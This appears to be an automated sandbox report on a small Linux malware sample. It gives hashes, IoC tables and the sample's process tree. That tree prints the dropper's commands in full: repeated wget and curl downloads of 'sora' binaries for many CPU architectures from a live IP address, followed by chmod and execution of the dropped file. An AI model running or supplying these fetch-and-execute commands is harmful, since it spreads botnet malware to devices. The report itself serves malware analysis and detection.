848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54 | Triage

Analysis

max time kernel
30s
max time network
31s
platform
debian-9_mips
resource
debian9-mipsbe-20240226-en
resource tags

arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
28-03-2024 10:06

Sharing

Report Analysis Logs

General

Target

02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
Size

1KB
MD5

02ca1bec2de42845c35867af0dc72be3
SHA1

d2fc439476dd4ec34fce01257762a34b0aa6f3d5
SHA256

848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
SHA512

302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 10 IoCs

Processes:

robbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobbenrobben

ioc	pid	process
/tmp/robben	740	robben
/tmp/robben	747	robben
/tmp/robben	754	robben
/tmp/robben	760	robben
/tmp/robben	766	robben
/tmp/robben	777	robben
/tmp/robben	793	robben
/tmp/robben	808	robben
/tmp/robben	828	robben
/tmp/robben	844	robben

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

description ioc

File opened for modification /tmp/robben

/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
1⤵
PID:709

/usr/bin/wget
wget http://188.127.235.211/bins/sora.x86
2⤵
PID:712

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.x86
2⤵
- Reads runtime system information
PID:721

/bin/cat
cat sora.x86
2⤵
PID:733

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:739

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:740

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mips
2⤵
PID:742

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mips
2⤵
- Reads runtime system information
PID:743

/bin/cat
cat sora.mips
2⤵
PID:745

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:746

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:747

/usr/bin/wget
wget http://188.127.235.211/bins/sora.mpsl
2⤵
PID:749

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.mpsl
2⤵
- Reads runtime system information
PID:751

/bin/cat
cat sora.mpsl
2⤵
PID:752

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:753

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:754

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm4
2⤵
PID:756

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm4
2⤵
- Reads runtime system information
PID:757

/bin/cat
cat sora.arm4
2⤵
PID:758

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:759

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:760

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm5
2⤵
PID:762

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm5
2⤵
- Reads runtime system information
PID:763

/bin/cat
cat sora.arm5
2⤵
PID:764

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:765

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:766

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm6
2⤵
PID:768

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm6
2⤵
- Reads runtime system information
PID:769

/bin/cat
cat sora.arm6
2⤵
PID:774

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:775

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:777

/usr/bin/wget
wget http://188.127.235.211/bins/sora.arm7
2⤵
PID:780

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.arm7
2⤵
- Reads runtime system information
PID:783

/bin/cat
cat sora.arm7
2⤵
PID:790

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:791

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:793

/usr/bin/wget
wget http://188.127.235.211/bins/sora.ppc
2⤵
PID:795

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.ppc
2⤵
- Reads runtime system information
PID:799

/bin/cat
cat sora.ppc
2⤵
PID:806

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:807

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:808

/usr/bin/wget
wget http://188.127.235.211/bins/sora.m68k
2⤵
PID:811

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.m68k
2⤵
- Reads runtime system information
PID:814

/bin/cat
cat sora.m68k
2⤵
PID:826

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-94d06da201c94aecaa98118da6431e25-systemd-timedated.service-Flu0dN
2⤵
PID:827

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:828

/usr/bin/wget
wget http://188.127.235.211/bins/sora.sh4
2⤵
PID:831

/usr/bin/curl
curl -O http://188.127.235.211/bins/sora.sh4
2⤵
- Reads runtime system information
PID:834

/bin/cat
cat sora.sh4
2⤵
PID:842

/bin/chmod
chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben
2⤵
PID:843

/tmp/robben
./robben Payload
2⤵
- Executes dropped EXE
PID:844

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...